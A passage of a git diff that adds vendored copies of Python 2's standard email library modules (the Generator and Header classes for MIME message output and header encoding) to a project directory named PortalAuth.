self._cur[lastheader] = EMPTYSTRING.join(lastvalue).rstrip('\r\n')
|
||||
BIN
PortalAuth/includes/scripts/libs/email/feedparser.pyc
Executable file
BIN
PortalAuth/includes/scripts/libs/email/feedparser.pyc
Executable file
Binary file not shown.
364
PortalAuth/includes/scripts/libs/email/generator.py
Executable file
364
PortalAuth/includes/scripts/libs/email/generator.py
Executable file
@@ -0,0 +1,364 @@
|
||||
# Copyright (C) 2001-2010 Python Software Foundation
|
||||
# Contact: email-sig@python.org
|
||||
|
||||
"""Classes to generate plain text from a message object tree."""
|
||||
|
||||
__all__ = ['Generator', 'DecodedGenerator']
|
||||
|
||||
import re
|
||||
import sys
|
||||
import time
|
||||
import random
|
||||
import warnings
|
||||
|
||||
from cStringIO import StringIO
|
||||
from email.header import Header
|
||||
|
||||
UNDERSCORE = '_'
|
||||
NL = '\n'
|
||||
|
||||
fcre = re.compile(r'^From ', re.MULTILINE)
|
||||
|
||||
def _is8bitstring(s):
|
||||
if isinstance(s, str):
|
||||
try:
|
||||
unicode(s, 'us-ascii')
|
||||
except UnicodeError:
|
||||
return True
|
||||
return False
|
||||
|
||||
|
||||
|
||||
class Generator:
|
||||
"""Generates output from a Message object tree.
|
||||
|
||||
This basic generator writes the message to the given file object as plain
|
||||
text.
|
||||
"""
|
||||
#
|
||||
# Public interface
|
||||
#
|
||||
|
||||
def __init__(self, outfp, mangle_from_=True, maxheaderlen=78):
|
||||
"""Create the generator for message flattening.
|
||||
|
||||
outfp is the output file-like object for writing the message to. It
|
||||
must have a write() method.
|
||||
|
||||
Optional mangle_from_ is a flag that, when True (the default), escapes
|
||||
From_ lines in the body of the message by putting a `>' in front of
|
||||
them.
|
||||
|
||||
Optional maxheaderlen specifies the longest length for a non-continued
|
||||
header. When a header line is longer (in characters, with tabs
|
||||
expanded to 8 spaces) than maxheaderlen, the header will split as
|
||||
defined in the Header class. Set maxheaderlen to zero to disable
|
||||
header wrapping. The default is 78, as recommended (but not required)
|
||||
by RFC 2822.
|
||||
"""
|
||||
self._fp = outfp
|
||||
self._mangle_from_ = mangle_from_
|
||||
self._maxheaderlen = maxheaderlen
|
||||
|
||||
def write(self, s):
|
||||
# Just delegate to the file object
|
||||
self._fp.write(s)
|
||||
|
||||
def flatten(self, msg, unixfrom=False):
|
||||
"""Print the message object tree rooted at msg to the output file
|
||||
specified when the Generator instance was created.
|
||||
|
||||
unixfrom is a flag that forces the printing of a Unix From_ delimiter
|
||||
before the first object in the message tree. If the original message
|
||||
has no From_ delimiter, a `standard' one is crafted. By default, this
|
||||
is False to inhibit the printing of any From_ delimiter.
|
||||
|
||||
Note that for subobjects, no From_ line is printed.
|
||||
"""
|
||||
if unixfrom:
|
||||
ufrom = msg.get_unixfrom()
|
||||
if not ufrom:
|
||||
ufrom = 'From nobody ' + time.ctime(time.time())
|
||||
print >> self._fp, ufrom
|
||||
self._write(msg)
|
||||
|
||||
def clone(self, fp):
|
||||
"""Clone this generator with the exact same options."""
|
||||
return self.__class__(fp, self._mangle_from_, self._maxheaderlen)
|
||||
|
||||
#
|
||||
# Protected interface - undocumented ;/
|
||||
#
|
||||
|
||||
def _write(self, msg):
|
||||
# We can't write the headers yet because of the following scenario:
|
||||
# say a multipart message includes the boundary string somewhere in
|
||||
# its body. We'd have to calculate the new boundary /before/ we write
|
||||
# the headers so that we can write the correct Content-Type:
|
||||
# parameter.
|
||||
#
|
||||
# The way we do this, so as to make the _handle_*() methods simpler,
|
||||
# is to cache any subpart writes into a StringIO. The we write the
|
||||
# headers and the StringIO contents. That way, subpart handlers can
|
||||
# Do The Right Thing, and can still modify the Content-Type: header if
|
||||
# necessary.
|
||||
oldfp = self._fp
|
||||
try:
|
||||
self._fp = sfp = StringIO()
|
||||
self._dispatch(msg)
|
||||
finally:
|
||||
self._fp = oldfp
|
||||
# Write the headers. First we see if the message object wants to
|
||||
# handle that itself. If not, we'll do it generically.
|
||||
meth = getattr(msg, '_write_headers', None)
|
||||
if meth is None:
|
||||
self._write_headers(msg)
|
||||
else:
|
||||
meth(self)
|
||||
self._fp.write(sfp.getvalue())
|
||||
|
||||
def _dispatch(self, msg):
|
||||
# Get the Content-Type: for the message, then try to dispatch to
|
||||
# self._handle_<maintype>_<subtype>(). If there's no handler for the
|
||||
# full MIME type, then dispatch to self._handle_<maintype>(). If
|
||||
# that's missing too, then dispatch to self._writeBody().
|
||||
main = msg.get_content_maintype()
|
||||
sub = msg.get_content_subtype()
|
||||
specific = UNDERSCORE.join((main, sub)).replace('-', '_')
|
||||
meth = getattr(self, '_handle_' + specific, None)
|
||||
if meth is None:
|
||||
generic = main.replace('-', '_')
|
||||
meth = getattr(self, '_handle_' + generic, None)
|
||||
if meth is None:
|
||||
meth = self._writeBody
|
||||
meth(msg)
|
||||
|
||||
#
|
||||
# Default handlers
|
||||
#
|
||||
|
||||
def _write_headers(self, msg):
|
||||
for h, v in msg.items():
|
||||
print >> self._fp, '%s:' % h,
|
||||
if self._maxheaderlen == 0:
|
||||
# Explicit no-wrapping
|
||||
print >> self._fp, v
|
||||
elif isinstance(v, Header):
|
||||
# Header instances know what to do
|
||||
print >> self._fp, v.encode()
|
||||
elif _is8bitstring(v):
|
||||
# If we have raw 8bit data in a byte string, we have no idea
|
||||
# what the encoding is. There is no safe way to split this
|
||||
# string. If it's ascii-subset, then we could do a normal
|
||||
# ascii split, but if it's multibyte then we could break the
|
||||
# string. There's no way to know so the least harm seems to
|
||||
# be to not split the string and risk it being too long.
|
||||
print >> self._fp, v
|
||||
else:
|
||||
# Header's got lots of smarts, so use it. Note that this is
|
||||
# fundamentally broken though because we lose idempotency when
|
||||
# the header string is continued with tabs. It will now be
|
||||
# continued with spaces. This was reversedly broken before we
|
||||
# fixed bug 1974. Either way, we lose.
|
||||
print >> self._fp, Header(
|
||||
v, maxlinelen=self._maxheaderlen, header_name=h).encode()
|
||||
# A blank line always separates headers from body
|
||||
print >> self._fp
|
||||
|
||||
#
|
||||
# Handlers for writing types and subtypes
|
||||
#
|
||||
|
||||
def _handle_text(self, msg):
|
||||
payload = msg.get_payload()
|
||||
if payload is None:
|
||||
return
|
||||
if not isinstance(payload, basestring):
|
||||
raise TypeError('string payload expected: %s' % type(payload))
|
||||
if self._mangle_from_:
|
||||
payload = fcre.sub('>From ', payload)
|
||||
self._fp.write(payload)
|
||||
|
||||
# Default body handler
|
||||
_writeBody = _handle_text
|
||||
|
||||
def _handle_multipart(self, msg):
|
||||
# The trick here is to write out each part separately, merge them all
|
||||
# together, and then make sure that the boundary we've chosen isn't
|
||||
# present in the payload.
|
||||
msgtexts = []
|
||||
subparts = msg.get_payload()
|
||||
if subparts is None:
|
||||
subparts = []
|
||||
elif isinstance(subparts, basestring):
|
||||
# e.g. a non-strict parse of a message with no starting boundary.
|
||||
self._fp.write(subparts)
|
||||
return
|
||||
elif not isinstance(subparts, list):
|
||||
# Scalar payload
|
||||
subparts = [subparts]
|
||||
for part in subparts:
|
||||
s = StringIO()
|
||||
g = self.clone(s)
|
||||
g.flatten(part, unixfrom=False)
|
||||
msgtexts.append(s.getvalue())
|
||||
# BAW: What about boundaries that are wrapped in double-quotes?
|
||||
boundary = msg.get_boundary()
|
||||
if not boundary:
|
||||
# Create a boundary that doesn't appear in any of the
|
||||
# message texts.
|
||||
alltext = NL.join(msgtexts)
|
||||
boundary = _make_boundary(alltext)
|
||||
msg.set_boundary(boundary)
|
||||
# If there's a preamble, write it out, with a trailing CRLF
|
||||
if msg.preamble is not None:
|
||||
print >> self._fp, msg.preamble
|
||||
# dash-boundary transport-padding CRLF
|
||||
print >> self._fp, '--' + boundary
|
||||
# body-part
|
||||
if msgtexts:
|
||||
self._fp.write(msgtexts.pop(0))
|
||||
# *encapsulation
|
||||
# --> delimiter transport-padding
|
||||
# --> CRLF body-part
|
||||
for body_part in msgtexts:
|
||||
# delimiter transport-padding CRLF
|
||||
print >> self._fp, '\n--' + boundary
|
||||
# body-part
|
||||
self._fp.write(body_part)
|
||||
# close-delimiter transport-padding
|
||||
self._fp.write('\n--' + boundary + '--')
|
||||
if msg.epilogue is not None:
|
||||
print >> self._fp
|
||||
self._fp.write(msg.epilogue)
|
||||
|
||||
def _handle_multipart_signed(self, msg):
|
||||
# The contents of signed parts has to stay unmodified in order to keep
|
||||
# the signature intact per RFC1847 2.1, so we disable header wrapping.
|
||||
# RDM: This isn't enough to completely preserve the part, but it helps.
|
||||
old_maxheaderlen = self._maxheaderlen
|
||||
try:
|
||||
self._maxheaderlen = 0
|
||||
self._handle_multipart(msg)
|
||||
finally:
|
||||
self._maxheaderlen = old_maxheaderlen
|
||||
|
||||
def _handle_message_delivery_status(self, msg):
|
||||
# We can't just write the headers directly to self's file object
|
||||
# because this will leave an extra newline between the last header
|
||||
# block and the boundary. Sigh.
|
||||
blocks = []
|
||||
for part in msg.get_payload():
|
||||
s = StringIO()
|
||||
g = self.clone(s)
|
||||
g.flatten(part, unixfrom=False)
|
||||
text = s.getvalue()
|
||||
lines = text.split('\n')
|
||||
# Strip off the unnecessary trailing empty line
|
||||
if lines and lines[-1] == '':
|
||||
blocks.append(NL.join(lines[:-1]))
|
||||
else:
|
||||
blocks.append(text)
|
||||
# Now join all the blocks with an empty line. This has the lovely
|
||||
# effect of separating each block with an empty line, but not adding
|
||||
# an extra one after the last one.
|
||||
self._fp.write(NL.join(blocks))
|
||||
|
||||
def _handle_message(self, msg):
|
||||
s = StringIO()
|
||||
g = self.clone(s)
|
||||
# The payload of a message/rfc822 part should be a multipart sequence
|
||||
# of length 1. The zeroth element of the list should be the Message
|
||||
# object for the subpart. Extract that object, stringify it, and
|
||||
# write it out.
|
||||
# Except, it turns out, when it's a string instead, which happens when
|
||||
# and only when HeaderParser is used on a message of mime type
|
||||
# message/rfc822. Such messages are generated by, for example,
|
||||
# Groupwise when forwarding unadorned messages. (Issue 7970.) So
|
||||
# in that case we just emit the string body.
|
||||
payload = msg.get_payload()
|
||||
if isinstance(payload, list):
|
||||
g.flatten(msg.get_payload(0), unixfrom=False)
|
||||
payload = s.getvalue()
|
||||
self._fp.write(payload)
|
||||
|
||||
|
||||
|
||||
_FMT = '[Non-text (%(type)s) part of message omitted, filename %(filename)s]'
|
||||
|
||||
class DecodedGenerator(Generator):
|
||||
"""Generates a text representation of a message.
|
||||
|
||||
Like the Generator base class, except that non-text parts are substituted
|
||||
with a format string representing the part.
|
||||
"""
|
||||
def __init__(self, outfp, mangle_from_=True, maxheaderlen=78, fmt=None):
|
||||
"""Like Generator.__init__() except that an additional optional
|
||||
argument is allowed.
|
||||
|
||||
Walks through all subparts of a message. If the subpart is of main
|
||||
type `text', then it prints the decoded payload of the subpart.
|
||||
|
||||
Otherwise, fmt is a format string that is used instead of the message
|
||||
payload. fmt is expanded with the following keywords (in
|
||||
%(keyword)s format):
|
||||
|
||||
type : Full MIME type of the non-text part
|
||||
maintype : Main MIME type of the non-text part
|
||||
subtype : Sub-MIME type of the non-text part
|
||||
filename : Filename of the non-text part
|
||||
description: Description associated with the non-text part
|
||||
encoding : Content transfer encoding of the non-text part
|
||||
|
||||
The default value for fmt is None, meaning
|
||||
|
||||
[Non-text (%(type)s) part of message omitted, filename %(filename)s]
|
||||
"""
|
||||
Generator.__init__(self, outfp, mangle_from_, maxheaderlen)
|
||||
if fmt is None:
|
||||
self._fmt = _FMT
|
||||
else:
|
||||
self._fmt = fmt
|
||||
|
||||
def _dispatch(self, msg):
|
||||
for part in msg.walk():
|
||||
maintype = part.get_content_maintype()
|
||||
if maintype == 'text':
|
||||
print >> self, part.get_payload(decode=True)
|
||||
elif maintype == 'multipart':
|
||||
# Just skip this
|
||||
pass
|
||||
else:
|
||||
print >> self, self._fmt % {
|
||||
'type' : part.get_content_type(),
|
||||
'maintype' : part.get_content_maintype(),
|
||||
'subtype' : part.get_content_subtype(),
|
||||
'filename' : part.get_filename('[no filename]'),
|
||||
'description': part.get('Content-Description',
|
||||
'[no description]'),
|
||||
'encoding' : part.get('Content-Transfer-Encoding',
|
||||
'[no encoding]'),
|
||||
}
|
||||
|
||||
|
||||
|
||||
# Helper
|
||||
_width = len(repr(sys.maxint-1))
|
||||
_fmt = '%%0%dd' % _width
|
||||
|
||||
def _make_boundary(text=None):
|
||||
# Craft a random boundary. If text is given, ensure that the chosen
|
||||
# boundary doesn't appear in the text.
|
||||
token = random.randrange(sys.maxint)
|
||||
boundary = ('=' * 15) + (_fmt % token) + '=='
|
||||
if text is None:
|
||||
return boundary
|
||||
b = boundary
|
||||
counter = 0
|
||||
while True:
|
||||
cre = re.compile('^--' + re.escape(b) + '(--)?$', re.MULTILINE)
|
||||
if not cre.search(text):
|
||||
break
|
||||
b = boundary + '.' + str(counter)
|
||||
counter += 1
|
||||
return b
|
||||
514
PortalAuth/includes/scripts/libs/email/header.py
Executable file
514
PortalAuth/includes/scripts/libs/email/header.py
Executable file
@@ -0,0 +1,514 @@
|
||||
# Copyright (C) 2002-2006 Python Software Foundation
|
||||
# Author: Ben Gertzfield, Barry Warsaw
|
||||
# Contact: email-sig@python.org
|
||||
|
||||
"""Header encoding and decoding functionality."""
|
||||
|
||||
__all__ = [
|
||||
'Header',
|
||||
'decode_header',
|
||||
'make_header',
|
||||
]
|
||||
|
||||
import re
|
||||
import binascii
|
||||
|
||||
import email.quoprimime
|
||||
import email.base64mime
|
||||
|
||||
from email.errors import HeaderParseError
|
||||
from email.charset import Charset
|
||||
|
||||
NL = '\n'
|
||||
SPACE = ' '
|
||||
USPACE = u' '
|
||||
SPACE8 = ' ' * 8
|
||||
UEMPTYSTRING = u''
|
||||
|
||||
MAXLINELEN = 76
|
||||
|
||||
USASCII = Charset('us-ascii')
|
||||
UTF8 = Charset('utf-8')
|
||||
|
||||
# Match encoded-word strings in the form =?charset?q?Hello_World?=
|
||||
ecre = re.compile(r'''
|
||||
=\? # literal =?
|
||||
(?P<charset>[^?]*?) # non-greedy up to the next ? is the charset
|
||||
\? # literal ?
|
||||
(?P<encoding>[qb]) # either a "q" or a "b", case insensitive
|
||||
\? # literal ?
|
||||
(?P<encoded>.*?) # non-greedy up to the next ?= is the encoded string
|
||||
\?= # literal ?=
|
||||
(?=[ \t]|$) # whitespace or the end of the string
|
||||
''', re.VERBOSE | re.IGNORECASE | re.MULTILINE)
|
||||
|
||||
# Field name regexp, including trailing colon, but not separating whitespace,
|
||||
# according to RFC 2822. Character range is from tilde to exclamation mark.
|
||||
# For use with .match()
|
||||
fcre = re.compile(r'[\041-\176]+:$')
|
||||
|
||||
# Find a header embedded in a putative header value. Used to check for
|
||||
# header injection attack.
|
||||
_embeded_header = re.compile(r'\n[^ \t]+:')
|
||||
|
||||
|
||||
|
||||
# Helpers
|
||||
_max_append = email.quoprimime._max_append
|
||||
|
||||
|
||||
|
||||
def decode_header(header):
|
||||
"""Decode a message header value without converting charset.
|
||||
|
||||
Returns a list of (decoded_string, charset) pairs containing each of the
|
||||
decoded parts of the header. Charset is None for non-encoded parts of the
|
||||
header, otherwise a lower-case string containing the name of the character
|
||||
set specified in the encoded string.
|
||||
|
||||
An email.errors.HeaderParseError may be raised when certain decoding error
|
||||
occurs (e.g. a base64 decoding exception).
|
||||
"""
|
||||
# If no encoding, just return the header
|
||||
header = str(header)
|
||||
if not ecre.search(header):
|
||||
return [(header, None)]
|
||||
decoded = []
|
||||
dec = ''
|
||||
for line in header.splitlines():
|
||||
# This line might not have an encoding in it
|
||||
if not ecre.search(line):
|
||||
decoded.append((line, None))
|
||||
continue
|
||||
parts = ecre.split(line)
|
||||
while parts:
|
||||
unenc = parts.pop(0).strip()
|
||||
if unenc:
|
||||
# Should we continue a long line?
|
||||
if decoded and decoded[-1][1] is None:
|
||||
decoded[-1] = (decoded[-1][0] + SPACE + unenc, None)
|
||||
else:
|
||||
decoded.append((unenc, None))
|
||||
if parts:
|
||||
charset, encoding = [s.lower() for s in parts[0:2]]
|
||||
encoded = parts[2]
|
||||
dec = None
|
||||
if encoding == 'q':
|
||||
dec = email.quoprimime.header_decode(encoded)
|
||||
elif encoding == 'b':
|
||||
paderr = len(encoded) % 4 # Postel's law: add missing padding
|
||||
if paderr:
|
||||
encoded += '==='[:4 - paderr]
|
||||
try:
|
||||
dec = email.base64mime.decode(encoded)
|
||||
except binascii.Error:
|
||||
# Turn this into a higher level exception. BAW: Right
|
||||
# now we throw the lower level exception away but
|
||||
# when/if we get exception chaining, we'll preserve it.
|
||||
raise HeaderParseError
|
||||
if dec is None:
|
||||
dec = encoded
|
||||
|
||||
if decoded and decoded[-1][1] == charset:
|
||||
decoded[-1] = (decoded[-1][0] + dec, decoded[-1][1])
|
||||
else:
|
||||
decoded.append((dec, charset))
|
||||
del parts[0:3]
|
||||
return decoded
|
||||
|
||||
|
||||
|
||||
def make_header(decoded_seq, maxlinelen=None, header_name=None,
|
||||
continuation_ws=' '):
|
||||
"""Create a Header from a sequence of pairs as returned by decode_header()
|
||||
|
||||
decode_header() takes a header value string and returns a sequence of
|
||||
pairs of the format (decoded_string, charset) where charset is the string
|
||||
name of the character set.
|
||||
|
||||
This function takes one of those sequence of pairs and returns a Header
|
||||
instance. Optional maxlinelen, header_name, and continuation_ws are as in
|
||||
the Header constructor.
|
||||
"""
|
||||
h = Header(maxlinelen=maxlinelen, header_name=header_name,
|
||||
continuation_ws=continuation_ws)
|
||||
for s, charset in decoded_seq:
|
||||
# None means us-ascii but we can simply pass it on to h.append()
|
||||
if charset is not None and not isinstance(charset, Charset):
|
||||
charset = Charset(charset)
|
||||
h.append(s, charset)
|
||||
return h
|
||||
|
||||
|
||||
|
||||
class Header:
|
||||
def __init__(self, s=None, charset=None,
|
||||
maxlinelen=None, header_name=None,
|
||||
continuation_ws=' ', errors='strict'):
|
||||
"""Create a MIME-compliant header that can contain many character sets.
|
||||
|
||||
Optional s is the initial header value. If None, the initial header
|
||||
value is not set. You can later append to the header with .append()
|
||||
method calls. s may be a byte string or a Unicode string, but see the
|
||||
.append() documentation for semantics.
|
||||
|
||||
Optional charset serves two purposes: it has the same meaning as the
|
||||
charset argument to the .append() method. It also sets the default
|
||||
character set for all subsequent .append() calls that omit the charset
|
||||
argument. If charset is not provided in the constructor, the us-ascii
|
||||
charset is used both as s's initial charset and as the default for
|
||||
subsequent .append() calls.
|
||||
|
||||
The maximum line length can be specified explicit via maxlinelen. For
|
||||
splitting the first line to a shorter value (to account for the field
|
||||
header which isn't included in s, e.g. `Subject') pass in the name of
|
||||
the field in header_name. The default maxlinelen is 76.
|
||||
|
||||
continuation_ws must be RFC 2822 compliant folding whitespace (usually
|
||||
either a space or a hard tab) which will be prepended to continuation
|
||||
lines.
|
||||
|
||||
errors is passed through to the .append() call.
|
||||
"""
|
||||
if charset is None:
|
||||
charset = USASCII
|
||||
if not isinstance(charset, Charset):
|
||||
charset = Charset(charset)
|
||||
self._charset = charset
|
||||
self._continuation_ws = continuation_ws
|
||||
cws_expanded_len = len(continuation_ws.replace('\t', SPACE8))
|
||||
# BAW: I believe `chunks' and `maxlinelen' should be non-public.
|
||||
self._chunks = []
|
||||
if s is not None:
|
||||
self.append(s, charset, errors)
|
||||
if maxlinelen is None:
|
||||
maxlinelen = MAXLINELEN
|
||||
if header_name is None:
|
||||
# We don't know anything about the field header so the first line
|
||||
# is the same length as subsequent lines.
|
||||
self._firstlinelen = maxlinelen
|
||||
else:
|
||||
# The first line should be shorter to take into account the field
|
||||
# header. Also subtract off 2 extra for the colon and space.
|
||||
self._firstlinelen = maxlinelen - len(header_name) - 2
|
||||
# Second and subsequent lines should subtract off the length in
|
||||
# columns of the continuation whitespace prefix.
|
||||
self._maxlinelen = maxlinelen - cws_expanded_len
|
||||
|
||||
def __str__(self):
|
||||
"""A synonym for self.encode()."""
|
||||
return self.encode()
|
||||
|
||||
def __unicode__(self):
|
||||
"""Helper for the built-in unicode function."""
|
||||
uchunks = []
|
||||
lastcs = None
|
||||
for s, charset in self._chunks:
|
||||
# We must preserve spaces between encoded and non-encoded word
|
||||
# boundaries, which means for us we need to add a space when we go
|
||||
# from a charset to None/us-ascii, or from None/us-ascii to a
|
||||
# charset. Only do this for the second and subsequent chunks.
|
||||
nextcs = charset
|
||||
if uchunks:
|
||||
if lastcs not in (None, 'us-ascii'):
|
||||
if nextcs in (None, 'us-ascii'):
|
||||
uchunks.append(USPACE)
|
||||
nextcs = None
|
||||
elif nextcs not in (None, 'us-ascii'):
|
||||
uchunks.append(USPACE)
|
||||
lastcs = nextcs
|
||||
uchunks.append(unicode(s, str(charset)))
|
||||
return UEMPTYSTRING.join(uchunks)
|
||||
|
||||
# Rich comparison operators for equality only. BAW: does it make sense to
|
||||
# have or explicitly disable <, <=, >, >= operators?
|
||||
def __eq__(self, other):
|
||||
# other may be a Header or a string. Both are fine so coerce
|
||||
# ourselves to a string, swap the args and do another comparison.
|
||||
return other == self.encode()
|
||||
|
||||
def __ne__(self, other):
|
||||
return not self == other
|
||||
|
||||
def append(self, s, charset=None, errors='strict'):
|
||||
"""Append a string to the MIME header.
|
||||
|
||||
Optional charset, if given, should be a Charset instance or the name
|
||||
of a character set (which will be converted to a Charset instance). A
|
||||
value of None (the default) means that the charset given in the
|
||||
constructor is used.
|
||||
|
||||
s may be a byte string or a Unicode string. If it is a byte string
|
||||
(i.e. isinstance(s, str) is true), then charset is the encoding of
|
||||
that byte string, and a UnicodeError will be raised if the string
|
||||
cannot be decoded with that charset. If s is a Unicode string, then
|
||||
charset is a hint specifying the character set of the characters in
|
||||
the string. In this case, when producing an RFC 2822 compliant header
|
||||
using RFC 2047 rules, the Unicode string will be encoded using the
|
||||
following charsets in order: us-ascii, the charset hint, utf-8. The
|
||||
first character set not to provoke a UnicodeError is used.
|
||||
|
||||
Optional `errors' is passed as the third argument to any unicode() or
|
||||
ustr.encode() call.
|
||||
"""
|
||||
if charset is None:
|
||||
charset = self._charset
|
||||
elif not isinstance(charset, Charset):
|
||||
charset = Charset(charset)
|
||||
# If the charset is our faux 8bit charset, leave the string unchanged
|
||||
if charset != '8bit':
|
||||
# We need to test that the string can be converted to unicode and
|
||||
# back to a byte string, given the input and output codecs of the
|
||||
# charset.
|
||||
if isinstance(s, str):
|
||||
# Possibly raise UnicodeError if the byte string can't be
|
||||
# converted to a unicode with the input codec of the charset.
|
||||
incodec = charset.input_codec or 'us-ascii'
|
||||
ustr = unicode(s, incodec, errors)
|
||||
# Now make sure that the unicode could be converted back to a
|
||||
# byte string with the output codec, which may be different
|
||||
# than the iput coded. Still, use the original byte string.
|
||||
outcodec = charset.output_codec or 'us-ascii'
|
||||
ustr.encode(outcodec, errors)
|
||||
elif isinstance(s, unicode):
|
||||
# Now we have to be sure the unicode string can be converted
|
||||
# to a byte string with a reasonable output codec. We want to
|
||||
# use the byte string in the chunk.
|
||||
for charset in USASCII, charset, UTF8:
|
||||
try:
|
||||
outcodec = charset.output_codec or 'us-ascii'
|
||||
s = s.encode(outcodec, errors)
|
||||
break
|
||||
except UnicodeError:
|
||||
pass
|
||||
else:
|
||||
assert False, 'utf-8 conversion failed'
|
||||
self._chunks.append((s, charset))
|
||||
|
||||
def _split(self, s, charset, maxlinelen, splitchars):
|
||||
# Split up a header safely for use with encode_chunks.
|
||||
splittable = charset.to_splittable(s)
|
||||
encoded = charset.from_splittable(splittable, True)
|
||||
elen = charset.encoded_header_len(encoded)
|
||||
# If the line's encoded length first, just return it
|
||||
if elen <= maxlinelen:
|
||||
return [(encoded, charset)]
|
||||
# If we have undetermined raw 8bit characters sitting in a byte
|
||||
# string, we really don't know what the right thing to do is. We
|
||||
# can't really split it because it might be multibyte data which we
|
||||
# could break if we split it between pairs. The least harm seems to
|
||||
# be to not split the header at all, but that means they could go out
|
||||
# longer than maxlinelen.
|
||||
if charset == '8bit':
|
||||
return [(s, charset)]
|
||||
# BAW: I'm not sure what the right test here is. What we're trying to
|
||||
# do is be faithful to RFC 2822's recommendation that ($2.2.3):
|
||||
#
|
||||
# "Note: Though structured field bodies are defined in such a way that
|
||||
# folding can take place between many of the lexical tokens (and even
|
||||
# within some of the lexical tokens), folding SHOULD be limited to
|
||||
# placing the CRLF at higher-level syntactic breaks."
|
||||
#
|
||||
# For now, I can only imagine doing this when the charset is us-ascii,
|
||||
# although it's possible that other charsets may also benefit from the
|
||||
# higher-level syntactic breaks.
|
||||
elif charset == 'us-ascii':
|
||||
return self._split_ascii(s, charset, maxlinelen, splitchars)
|
||||
# BAW: should we use encoded?
|
||||
elif elen == len(s):
|
||||
# We can split on _maxlinelen boundaries because we know that the
|
||||
# encoding won't change the size of the string
|
||||
splitpnt = maxlinelen
|
||||
first = charset.from_splittable(splittable[:splitpnt], False)
|
||||
last = charset.from_splittable(splittable[splitpnt:], False)
|
||||
else:
|
||||
# Binary search for split point
|
||||
first, last = _binsplit(splittable, charset, maxlinelen)
|
||||
# first is of the proper length so just wrap it in the appropriate
|
||||
# chrome. last must be recursively split.
|
||||
fsplittable = charset.to_splittable(first)
|
||||
fencoded = charset.from_splittable(fsplittable, True)
|
||||
chunk = [(fencoded, charset)]
|
||||
return chunk + self._split(last, charset, self._maxlinelen, splitchars)
|
||||
|
||||
def _split_ascii(self, s, charset, firstlen, splitchars):
|
||||
chunks = _split_ascii(s, firstlen, self._maxlinelen,
|
||||
self._continuation_ws, splitchars)
|
||||
return zip(chunks, [charset]*len(chunks))
|
||||
|
||||
def _encode_chunks(self, newchunks, maxlinelen):
|
||||
# MIME-encode a header with many different charsets and/or encodings.
|
||||
#
|
||||
# Given a list of pairs (string, charset), return a MIME-encoded
|
||||
# string suitable for use in a header field. Each pair may have
|
||||
# different charsets and/or encodings, and the resulting header will
|
||||
# accurately reflect each setting.
|
||||
#
|
||||
# Each encoding can be email.utils.QP (quoted-printable, for
|
||||
# ASCII-like character sets like iso-8859-1), email.utils.BASE64
|
||||
# (Base64, for non-ASCII like character sets like KOI8-R and
|
||||
# iso-2022-jp), or None (no encoding).
|
||||
#
|
||||
# Each pair will be represented on a separate line; the resulting
|
||||
# string will be in the format:
|
||||
#
|
||||
# =?charset1?q?Mar=EDa_Gonz=E1lez_Alonso?=\n
|
||||
# =?charset2?b?SvxyZ2VuIEL2aW5n?="
|
||||
chunks = []
|
||||
for header, charset in newchunks:
|
||||
if not header:
|
||||
continue
|
||||
if charset is None or charset.header_encoding is None:
|
||||
s = header
|
||||
else:
|
||||
s = charset.header_encode(header)
|
||||
# Don't add more folding whitespace than necessary
|
||||
if chunks and chunks[-1].endswith(' '):
|
||||
extra = ''
|
||||
else:
|
||||
extra = ' '
|
||||
_max_append(chunks, s, maxlinelen, extra)
|
||||
joiner = NL + self._continuation_ws
|
||||
return joiner.join(chunks)
|
||||
|
||||
def encode(self, splitchars=';, '):
|
||||
"""Encode a message header into an RFC-compliant format.
|
||||
|
||||
There are many issues involved in converting a given string for use in
|
||||
an email header. Only certain character sets are readable in most
|
||||
email clients, and as header strings can only contain a subset of
|
||||
7-bit ASCII, care must be taken to properly convert and encode (with
|
||||
Base64 or quoted-printable) header strings. In addition, there is a
|
||||
75-character length limit on any given encoded header field, so
|
||||
line-wrapping must be performed, even with double-byte character sets.
|
||||
|
||||
This method will do its best to convert the string to the correct
|
||||
character set used in email, and encode and line wrap it safely with
|
||||
the appropriate scheme for that character set.
|
||||
|
||||
If the given charset is not known or an error occurs during
|
||||
conversion, this function will return the header untouched.
|
||||
|
||||
Optional splitchars is a string containing characters to split long
|
||||
ASCII lines on, in rough support of RFC 2822's `highest level
|
||||
syntactic breaks'. This doesn't affect RFC 2047 encoded lines.
|
||||
"""
|
||||
newchunks = []
|
||||
maxlinelen = self._firstlinelen
|
||||
lastlen = 0
|
||||
for s, charset in self._chunks:
|
||||
# The first bit of the next chunk should be just long enough to
|
||||
# fill the next line. Don't forget the space separating the
|
||||
# encoded words.
|
||||
targetlen = maxlinelen - lastlen - 1
|
||||
if targetlen < charset.encoded_header_len(''):
|
||||
# Stick it on the next line
|
||||
targetlen = maxlinelen
|
||||
newchunks += self._split(s, charset, targetlen, splitchars)
|
||||
lastchunk, lastcharset = newchunks[-1]
|
||||
lastlen = lastcharset.encoded_header_len(lastchunk)
|
||||
value = self._encode_chunks(newchunks, maxlinelen)
|
||||
if _embeded_header.search(value):
|
||||
raise HeaderParseError("header value appears to contain "
|
||||
"an embedded header: {!r}".format(value))
|
||||
return value
|
||||
|
||||
|
||||
|
||||
def _split_ascii(s, firstlen, restlen, continuation_ws, splitchars):
|
||||
lines = []
|
||||
maxlen = firstlen
|
||||
for line in s.splitlines():
|
||||
# Ignore any leading whitespace (i.e. continuation whitespace) already
|
||||
# on the line, since we'll be adding our own.
|
||||
line = line.lstrip()
|
||||
if len(line) < maxlen:
|
||||
lines.append(line)
|
||||
maxlen = restlen
|
||||
continue
|
||||
# Attempt to split the line at the highest-level syntactic break
|
||||
# possible. Note that we don't have a lot of smarts about field
|
||||
# syntax; we just try to break on semi-colons, then commas, then
|
||||
# whitespace.
|
||||
for ch in splitchars:
|
||||
if ch in line:
|
||||
break
|
||||
else:
|
||||
# There's nothing useful to split the line on, not even spaces, so
|
||||
# just append this line unchanged
|
||||
lines.append(line)
|
||||
maxlen = restlen
|
||||
continue
|
||||
# Now split the line on the character plus trailing whitespace
|
||||
cre = re.compile(r'%s\s*' % ch)
|
||||
if ch in ';,':
|
||||
eol = ch
|
||||
else:
|
||||
eol = ''
|
||||
joiner = eol + ' '
|
||||
joinlen = len(joiner)
|
||||
wslen = len(continuation_ws.replace('\t', SPACE8))
|
||||
this = []
|
||||
linelen = 0
|
||||
for part in cre.split(line):
|
||||
curlen = linelen + max(0, len(this)-1) * joinlen
|
||||
partlen = len(part)
|
||||
onfirstline = not lines
|
||||
# We don't want to split after the field name, if we're on the
|
||||
# first line and the field name is present in the header string.
|
||||
